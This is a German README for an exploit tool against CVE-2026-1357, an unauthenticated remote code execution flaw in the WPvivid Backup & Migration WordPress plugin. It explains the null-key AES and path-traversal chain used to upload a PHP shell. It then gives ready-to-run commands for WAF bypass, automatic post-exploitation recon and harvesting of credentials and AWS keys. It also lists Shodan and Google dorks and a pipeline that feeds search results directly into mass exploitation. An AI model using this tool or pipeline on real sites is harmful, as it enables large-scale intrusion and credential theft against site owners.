
Automatisiertes Exploit-Tool für CVE-2026-1357, eine nicht authentifizierte RCE in WPvivid Backup & Migration. Scannt WordPress-Ziele, umgeht WAF/403, lädt eine Shell über Path Traversal hoch und führt Post-Exploitation-Reconnaissance mit Berichtserstellung durch.
CVE-Credit: Lucas Montes (NiRoX)
Tool von: CyberTechAjju
CVSS: 9.8 (Kritisch) | Betroffen: ≤ 0.9.123 | Gepatcht: 0.9.124
Nur für autorisierte Sicherheitstests. Unautorisierter Zugriff auf Systeme ist illegal.
Unauthentifizierte RCE in WPvivid Backup & Migration über zwei verkettete Bugs:
openssl_private_decrypt() gibt bei falschem Schlüssel false zurück → phpseclib v1 behandelt dies als Null-Byte-AES-Schlüssel → Angreifer verschlüsselt mit 16 Null-Bytesname-Feld → ../uploads/shell.php entkommt dem Backup-VerzeichnisEinschränkung: Nur ausnutzbar, wenn wpvivid_api_token generiert und nicht abgelaufen ist.
| Funktion | Beschreibung |
|---|---|
| 🔍 Auto-Erkennung | WordPress + WPvivid-Plugin + Versions-Fingerprinting |
| 🛡️ WAF-Bypass | User-Agent-Rotation, Header-Spoofing, Encoding-Tricks |
| 🔓 403-Bypass | X-Forwarded-For, X-Original-URL, Pfadnormalisierung, doppeltes Encoding |
| 💀 Auto-Exploit | Null-Key-AES-Payload + Path-Traversal-Upload |
| 📋 Post-Exploit | Führt automatisch 20+ Recon-Befehle aus (id, whoami, passwd, wp-config, SUID, etc.) |
| 🔑 Datenextraktor | Grept DB-Zugangsdaten, API-Keys, Passwörter, AWS-Keys aus der Ausgabe |
| 📊 Berichtsgenerierung | Markdown-PoC-Bericht mit vollständigen Exploit-Nachweisen |
| ⚡ Massen-Scan | Multithreaded mit Proxy/Burp-Unterstützung |
git clone https://github.com/cybertechajju/CVE-2026-1357-poc.git
cd CVE-2026-1357-poc
pip install -r requirements.txt
# Nur scannen (WordPress + WPvivid + Version erkennen)
python3 cve_2026_1357.py -u http://target.com
# Scannen + Exploit + automatische Post-Exploitation
python3 cve_2026_1357.py -u http://target.com --exploit
# Exploit ohne Post-Exploitation-Recon
python3 cve_2026_1357.py -u http://target.com --exploit --no-post
# Massen-Scan mit Bericht
python3 cve_2026_1357.py -l targets.txt -t 20 --exploit --report
# Über Burp-Proxy
python3 cve_2026_1357.py -u http://target.com --exploit --proxy http://127.0.0.1:8080
# Nur-Payload-Modus
python3 cve_2026_1357.py -u http://x --payload-only
-u, --url Einzelne Ziel-URL
-l, --list Datei mit URLs (eine pro Zeile)
--exploit Exploit-Modus aktivieren
--shell NAME Shell-Dateiname (Standard: pwn_remote.php)
--no-post Post-Exploitation-Recon überspringen
--report Markdown-PoC-Bericht generieren
--report-dir DIR Ausgabeverzeichnis für Berichte
-t, --threads N Parallele Threads (Standard: 5)
--timeout SECS Request-Timeout (Standard: 10)
--proxy URL HTTP-Proxy für Burp
--payload-only Base64-Payload ausgeben & beenden
Siehe dorks.md für die vollständige Liste. Schnelle Beispiele:
# Shodan
http.html:"wpvivid-backuprestore"
http.html:"wpvivid" http.component:"WordPress"
# Google
inurl:"/wp-content/plugins/wpvivid-backuprestore/readme.txt"
# Pipeline
shodan search 'http.html:"wpvivid-backuprestore"' --fields ip_str,port --limit 500 \
| awk '{print "http://"$1":"$2}' > targets.txt
python3 cve_2026_1357.py -l targets.txt -t 20 --exploit --report
CVE-2026-1357-poc/
├── cve_2026_1357.py ← Haupttool (Scanner + Exploiter + Post-Exploit)
├── dorks.md ← Shodan/Google/Censys/FOFA/ZoomEye-Dorks
├── requirements.txt ← Python-Abhängigkeiten
├── .gitignore
└── README.md ← Diese Datei
Lucas Montes (NiRoX) — CVE-Entdeckung
CyberTechAjju — Exploit-Tooling